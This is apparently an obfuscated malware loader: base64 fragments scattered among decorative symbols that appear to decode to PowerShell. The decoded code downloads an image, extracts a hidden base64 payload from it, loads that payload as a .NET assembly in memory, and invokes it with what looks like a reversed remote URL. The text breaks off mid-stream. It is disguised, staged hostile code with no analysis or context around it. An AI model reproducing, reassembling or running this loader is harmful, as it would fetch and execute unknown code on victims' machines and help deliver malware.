⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgB0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷bgBs㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBV㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EU㏵ ⊷ ➟ ⇒ ▷bgBj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBV㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Rg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷UwB0㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷aQBu㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷K㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBC㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBT㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷QQBS㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷Pg㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷8㏵ ⊷ ➟ ⇒ ▷Dw㏵ ⊷ ➟ ⇒ ▷QgBB㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷RQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷XwBF㏵ ⊷ ➟ ⇒ ▷E4㏵ ⊷ ➟ ⇒ ▷R㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷+㏵ ⊷ ➟ ⇒ ▷D4㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bQBh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQBU㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷E8㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷ZQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷TwBm㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BG㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷YQBn㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cs㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷EY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷Gc㏵ ⊷ ➟ ⇒ ▷LgBM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷7㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷YgBh㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷2㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷T㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZwB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷Hg㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQBy㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷SQBu㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷aQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZwBl㏵ ⊷ ➟ ⇒ ▷FQ㏵ ⊷ ➟ ⇒ ▷ZQB4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷LgBT㏵ ⊷ ➟ ⇒ ▷HU㏵ ⊷ ➟ ⇒ ▷YgBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷Zw㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgB0㏵ ⊷ ➟ ⇒ ▷Ek㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BM㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷QwBv㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBG㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBt㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷YQBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷bgBn㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bi㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷DY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷BD㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷bwBh㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷ZQBk㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷cwBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBi㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷eQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷D0㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷FM㏵ ⊷ ➟ ⇒ ▷eQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷UgBl㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bp㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bg㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷cwBz㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQBi㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷eQBd㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷OgBM㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YQBk㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷Bj㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bQBt㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷bgBk㏵ ⊷ ➟ ⇒ ▷EI㏵ ⊷ ➟ ⇒ ▷eQB0㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷p㏵ ⊷ ➟ ⇒ ▷Ds㏵ ⊷ ➟ ⇒ ▷J㏵ ⊷ ➟ ⇒ ▷B0㏵ ⊷ ➟ ⇒ ▷Hk㏵ ⊷ ➟ ⇒ ▷c㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷QQBz㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷ZQBt㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷RwBl㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷V㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bu㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷aQBi㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷SQBP㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷S㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷Ow㏵ ⊷ ➟ ⇒ ▷k㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷bwBk㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷PQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷B5㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷Ec㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷E0㏵ ⊷ ➟ ⇒ ▷ZQB0㏵ ⊷ ➟ ⇒ ▷Gg㏵ ⊷ ➟ ⇒ ▷bwBk㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷JwBW㏵ ⊷ ➟ ⇒ ▷EE㏵ ⊷ ➟ ⇒ ▷SQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷LgBJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷dgBv㏵ ⊷ ➟ ⇒ ▷Gs㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷o㏵ ⊷ ➟ ⇒ ▷CQ㏵ ⊷ ➟ ⇒ ▷bgB1㏵ ⊷ ➟ ⇒ ▷Gw㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷WwBv㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷agBl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bb㏵ ⊷ ➟ ⇒ ▷F0㏵ ⊷ ➟ ⇒ ▷XQ㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cg㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷z㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷ZQ㏵ ⊷ ➟ ⇒ ▷3㏵ ⊷ ➟ ⇒ ▷GI㏵ ⊷ ➟ ⇒ ▷ZQBh㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷1㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷Mw㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷Dg㏵ ⊷ ➟ ⇒ ▷Mw㏵ ⊷ ➟ ⇒ ▷3㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷LQBm㏵ ⊷ ➟ ⇒ ▷DM㏵ ⊷ ➟ ⇒ ▷Yg㏵ ⊷ ➟ ⇒ ▷0㏵ ⊷ ➟ ⇒ ▷C0㏵ ⊷ ➟ ⇒ ▷MgBl㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷MQ㏵ ⊷ ➟ ⇒ ▷t㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷ZgBk㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷Zg㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷ZQBr㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷m㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷aQBk㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷bQ㏵ ⊷ ➟ ⇒ ▷9㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷D8㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷B4㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ 